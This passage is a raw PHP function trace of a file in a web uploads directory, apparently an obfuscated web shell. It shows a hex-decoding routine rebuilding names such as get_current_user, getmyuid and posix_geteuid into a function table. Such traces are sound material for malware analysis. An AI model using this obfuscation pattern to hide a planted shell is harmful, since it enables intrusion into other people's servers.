2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1238	0	0.047328	722136	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1238	1	0.047339	722184
3	1238	R			105
3	1239	0	0.047352	722104	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1239	1	0.047364	722144
3	1239	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1240	0	0.047394	722136	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	1240	1	0.047405	722184
3	1240	R			109
3	1241	0	0.047418	722104	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	1241	1	0.047429	722144
3	1241	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1242	0	0.047459	722136	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1242	1	0.047470	722184
3	1242	R			101
3	1243	0	0.047482	722104	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1243	1	0.047493	722144
3	1243	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1244	0	0.047523	722136	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	1244	1	0.047535	722184
3	1244	R			95
3	1245	0	0.047548	722104	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	1245	1	0.047559	722144
3	1245	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1246	0	0.047589	722136	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	1246	1	0.047601	722184
3	1246	R			99
3	1247	0	0.047613	722104	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	1247	1	0.047623	722144
3	1247	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1248	0	0.047654	722136	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1248	1	0.047665	722184
3	1248	R			111
3	1249	0	0.047678	722104	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1249	1	0.047688	722144
3	1249	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1250	0	0.047719	722136	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1250	1	0.047730	722184
3	1250	R			110
3	1251	0	0.047743	722104	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1251	1	0.047757	722144
3	1251	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1252	0	0.047788	722144	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1252	1	0.047800	722192
3	1252	R			116
3	1253	0	0.047812	722112	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1253	1	0.047823	722152
3	1253	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1254	0	0.047853	722144	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1254	1	0.047864	722192
3	1254	R			101
3	1255	0	0.047877	722112	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1255	1	0.047889	722152
3	1255	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1256	0	0.047918	722144	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1256	1	0.047930	722192
3	1256	R			110
3	1257	0	0.047942	722112	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1257	1	0.047953	722152
3	1257	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1258	0	0.047983	722144	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1258	1	0.047994	722192
3	1258	R			116
3	1259	0	0.048006	722112	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1259	1	0.048018	722152
3	1259	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1260	0	0.048048	722144	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	1260	1	0.048059	722192
3	1260	R			95
3	1261	0	0.048072	722112	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	1261	1	0.048084	722152
3	1261	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1262	0	0.048114	722144	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1262	1	0.048126	722192
3	1262	R			116
3	1263	0	0.048138	722112	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1263	1	0.048150	722152
3	1263	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1264	0	0.048179	722144	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'79'
3	1264	1	0.048190	722192
3	1264	R			121
3	1265	0	0.048203	722112	chr	0		/var/www/html/uploads/lCT.php	204	1	121
3	1265	1	0.048214	722152
3	1265	R			'y'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1266	0	0.048244	722144	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	1266	1	0.048256	722192
3	1266	R			112
3	1267	0	0.048268	722112	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	1267	1	0.048280	722152
3	1267	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1268	0	0.048310	722152	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1268	1	0.048321	722200
3	1268	R			101
3	1269	0	0.048334	722120	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1269	1	0.048345	722160
3	1269	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1235	1	0.048375	722120
2	1235	R			'mime_content_type'
1		A						/var/www/html/uploads/lCT.php	7	$func[63] = 'mime_content_type'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1270	0	0.048411	722120	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6765745f63757272656e745f75736572'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 31
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1271	0	0.048452	722152	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	1271	1	0.048463	722200
3	1271	R			103
3	1272	0	0.048480	722120	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	1272	1	0.048491	722160
3	1272	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1273	0	0.048522	722184	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1273	1	0.048534	722232
3	1273	R			101
3	1274	0	0.048546	722152	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1274	1	0.048557	722192
3	1274	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1275	0	0.048588	722184	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1275	1	0.048600	722232
3	1275	R			116
3	1276	0	0.048612	722152	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1276	1	0.048623	722192
3	1276	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1277	0	0.048654	722184	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	1277	1	0.048666	722232
3	1277	R			95
3	1278	0	0.048678	722152	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	1278	1	0.048689	722192
3	1278	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1279	0	0.048719	722184	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	1279	1	0.048731	722232
3	1279	R			99
3	1280	0	0.048743	722152	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	1280	1	0.048754	722192
3	1280	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1281	0	0.048784	722184	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'75'
3	1281	1	0.048795	722232
3	1281	R			117
3	1282	0	0.048808	722152	chr	0		/var/www/html/uploads/lCT.php	204	1	117
3	1282	1	0.048819	722192
3	1282	R			'u'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1283	0	0.048849	722184	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1283	1	0.048860	722232
3	1283	R			114
3	1284	0	0.048872	722152	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1284	1	0.048883	722192
3	1284	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1285	0	0.048913	722184	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1285	1	0.048924	722232
3	1285	R			114
3	1286	0	0.048937	722152	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1286	1	0.048948	722192
3	1286	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1287	0	0.048978	722192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1287	1	0.048988	722240
3	1287	R			101
3	1288	0	0.049001	722160	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1288	1	0.049012	722200
3	1288	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1289	0	0.049042	722192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1289	1	0.049053	722240
3	1289	R			110
3	1290	0	0.049065	722160	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1290	1	0.049076	722200
3	1290	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1291	0	0.049106	722192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1291	1	0.049120	722240
3	1291	R			116
3	1292	0	0.049133	722160	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1292	1	0.049144	722200
3	1292	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1293	0	0.049193	722192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	1293	1	0.049205	722240
3	1293	R			95
3	1294	0	0.049222	722160	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	1294	1	0.049234	722200
3	1294	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1295	0	0.049264	722192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'75'
3	1295	1	0.049275	722240
3	1295	R			117
3	1296	0	0.049287	722160	chr	0		/var/www/html/uploads/lCT.php	204	1	117
3	1296	1	0.049299	722200
3	1296	R			'u'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1297	0	0.049328	722192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1297	1	0.049340	722240
3	1297	R			115
3	1298	0	0.049352	722160	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1298	1	0.049364	722200
3	1298	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1299	0	0.049394	722192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1299	1	0.049405	722240
3	1299	R			101
3	1300	0	0.049417	722160	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1300	1	0.049428	722200
3	1300	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1301	0	0.049458	722192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1301	1	0.049468	722240
3	1301	R			114
3	1302	0	0.049481	722160	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1302	1	0.049493	722200
3	1302	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1270	1	0.049523	722168
2	1270	R			'get_current_user'
1		A						/var/www/html/uploads/lCT.php	7	$func[64] = 'get_current_user'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1303	0	0.049558	722168	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6765746d79756964'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 15
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1304	0	0.049598	722200	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	1304	1	0.049610	722248
3	1304	R			103
3	1305	0	0.049622	722168	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	1305	1	0.049633	722208
3	1305	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1306	0	0.049664	722232	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1306	1	0.049675	722280
3	1306	R			101
3	1307	0	0.049688	722200	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1307	1	0.049700	722240
3	1307	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1308	0	0.049730	722232	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1308	1	0.049742	722280
3	1308	R			116
3	1309	0	0.049754	722200	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1309	1	0.049766	722240
3	1309	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1310	0	0.049796	722232	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	1310	1	0.049807	722280
3	1310	R			109
3	1311	0	0.049819	722200	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	1311	1	0.049831	722240
3	1311	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1312	0	0.049861	722232	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'79'
3	1312	1	0.049872	722280
3	1312	R			121
3	1313	0	0.049884	722200	chr	0		/var/www/html/uploads/lCT.php	204	1	121
3	1313	1	0.049895	722240
3	1313	R			'y'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1314	0	0.049926	722232	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'75'
3	1314	1	0.049939	722280
3	1314	R			117
3	1315	0	0.049952	722200	chr	0		/var/www/html/uploads/lCT.php	204	1	117
3	1315	1	0.049963	722240
3	1315	R			'u'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1316	0	0.049993	722232	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1316	1	0.050004	722280
3	1316	R			105
3	1317	0	0.050017	722200	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1317	1	0.050028	722240
3	1317	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1318	0	0.050058	722232	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	1318	1	0.050070	722280
3	1318	R			100
3	1319	0	0.050082	722200	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	1319	1	0.050093	722240
3	1319	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1303	1	0.050123	722208
2	1303	R			'getmyuid'
1		A						/var/www/html/uploads/lCT.php	7	$func[65] = 'getmyuid'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1320	0	0.050158	722208	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6765746d79676964'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 15
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1321	0	0.050199	722240	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	1321	1	0.050211	722288
3	1321	R			103
3	1322	0	0.050223	722208	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	1322	1	0.050234	722248
3	1322	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1323	0	0.050265	722272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1323	1	0.050277	722320
3	1323	R			101
3	1324	0	0.050289	722240	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1324	1	0.050300	722280
3	1324	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1325	0	0.050330	722272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1325	1	0.050342	722320
3	1325	R			116
3	1326	0	0.050355	722240	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1326	1	0.050367	722280
3	1326	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1327	0	0.050402	722272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	1327	1	0.050414	722320
3	1327	R			109
3	1328	0	0.050426	722240	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	1328	1	0.050437	722280
3	1328	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1329	0	0.050467	722272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'79'
3	1329	1	0.050479	722320
3	1329	R			121
3	1330	0	0.050491	722240	chr	0		/var/www/html/uploads/lCT.php	204	1	121
3	1330	1	0.050502	722280
3	1330	R			'y'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1331	0	0.050533	722272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	1331	1	0.050544	722320
3	1331	R			103
3	1332	0	0.050556	722240	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	1332	1	0.050568	722280
3	1332	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1333	0	0.050597	722272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1333	1	0.050608	722320
3	1333	R			105
3	1334	0	0.050620	722240	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1334	1	0.050631	722280
3	1334	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1335	0	0.050666	722272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	1335	1	0.050678	722320
3	1335	R			100
3	1336	0	0.050690	722240	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	1336	1	0.050702	722280
3	1336	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1320	1	0.050732	722248
2	1320	R			'getmygid'
1		A						/var/www/html/uploads/lCT.php	7	$func[66] = 'getmygid'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1337	0	0.050766	722248	dehex	1		/var/www/html/uploads/lCT.php	7	1	'706f7369785f67657465756964'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 25
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1338	0	0.050807	722280	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	1338	1	0.050819	722328
3	1338	R			112
3	1339	0	0.050832	722248	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	1339	1	0.050843	722288
3	1339	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1340	0	0.050874	722312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1340	1	0.050885	722360
3	1340	R			111
3	1341	0	0.050898	722280	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1341	1	0.050909	722320
3	1341	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1342	0	0.050940	722312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1342	1	0.050952	722360
3	1342	R			115
3	1343	0	0.050964	722280	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1343	1	0.050976	722320
3	1343	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1344	0	0.051006	722312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1344	1	0.051018	722360
3	1344	R			105
3	1345	0	0.051031	722280	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1345	1	0.051042	722320
3	1345	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1346	0	0.051072	722312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'78'
3	1346	1	0.051084	722360
3	1346	R			120
3	1347	0	0.051096	722280	chr	0		/var/www/html/uploads/lCT.php	204	1	120
3	1347	1	0.051108	722320
3	1347	R			'x'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1348	0	0.051139	722312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	1348	1	0.051150	722360
3	1348	R			95
3	1349	0	0.051163	722280	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	1349	1	0.051174	722320
3	1349	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1350	0	0.051205	722312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	1350	1	0.051216	722360
3	1350	R			103
3	1351	0	0.051228	722280	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	1351	1	0.051239	722320
3	1351	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1352	0	0.051269	722312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1352	1	0.051281	722360
3	1352	R			101
3	1353	0	0.051294	722280	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1353	1	0.051305	722320
3	1353	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1354	0	0.051335	722320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1354	1	0.051346	722368
3	1354	R			116
3	1355	0	0.051359	722288	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1355	1	0.051370	722328
3	1355	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1356	0	0.051403	722320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1356	1	0.051415	722368
3	1356	R			101
3	1357	0	0.051427	722288	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1357	1	0.051438	722328
3	1357	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1358	0	0.051468	722320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'75'
3	1358	1	0.051480	722368
3	1358	R			117
3	1359	0	0.051493	722288	chr	0		/var/www/html/uploads/lCT.php	204	1	117
3	1359	1	0.051504	722328
3	1359	R			'u'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1360	0	0.051534	722320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1360	1	0.051545	722368
3	1360	R			105
3	1361	0	0.051558	722288	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1361	1	0.051569	722328
3	1361	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1362	0	0.051599	722320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	1362	1	0.051610	722368
3	1362	R			100
3	1363	0	0.051622	722288	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	1363	1	0.051633	722328
3	1363	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1337	1	0.051663	722288
2	1337	R			'posix_geteuid'
1		A						/var/www/html/uploads/lCT.php	7	$func[67] = 'posix_geteuid'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1364	0	0.051698	722288	dehex	1		/var/www/html/uploads/lCT.php	7	1	'706f7369785f67657465676964'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 25
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1365	0	0.051739	722320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	1365	1	0.051750	722368
3	1365	R			112
3	1366	0	0.051763	722288	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	1366	1	0.051774	722328
3	1366	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1367	0	0.051805	722352	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1367	1	0.051816	722400
3	1367	R			111
3	1368	0	0.051828	722320	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1368	1	0.051839	722360
3	1368	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1369	0	0.051870	722352	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1369	1	0.051881	722400
3	1369	R			115
3	1370	0	0.051894	722320	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1370	1	0.051905	722360
3	1370	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1371	0	0.051935	722352	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1371	1	0.051946	722400
3	1371	R			105
3	1372	0	0.051959	722320	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1372	1	0.051970	722360
3	1372	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1373	0	0.052000	722352	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'78'
3	1373	1	0.052012	722400
3	1373	R			120
3	1374	0	0.052024	722320	chr	0		/var/www/html/uploads/lCT.php	204	1	120
3	1374	1	0.052036	722360
3	1374	R			'x'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1375	0	0.052066	722352	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	1375	1	0.052078	722400
3	1375	R			95
3	1376	0	0.052090	722320	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	1376	1	0.052106	722360
3	1376	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1377	0	0.052136	722352	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	1377	1	0.052148	722400
3	1377	R			103
3	1378	0	0.052160	722320	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	1378	1	0.052171	722360
3	1378	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1379	0	0.052201	722352	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1379	1	0.052213	722400
3	1379	R			101
3	1380	0	0.052225	722320	chr	0		/var/www/html/uploads/lCT.php	204	1	101
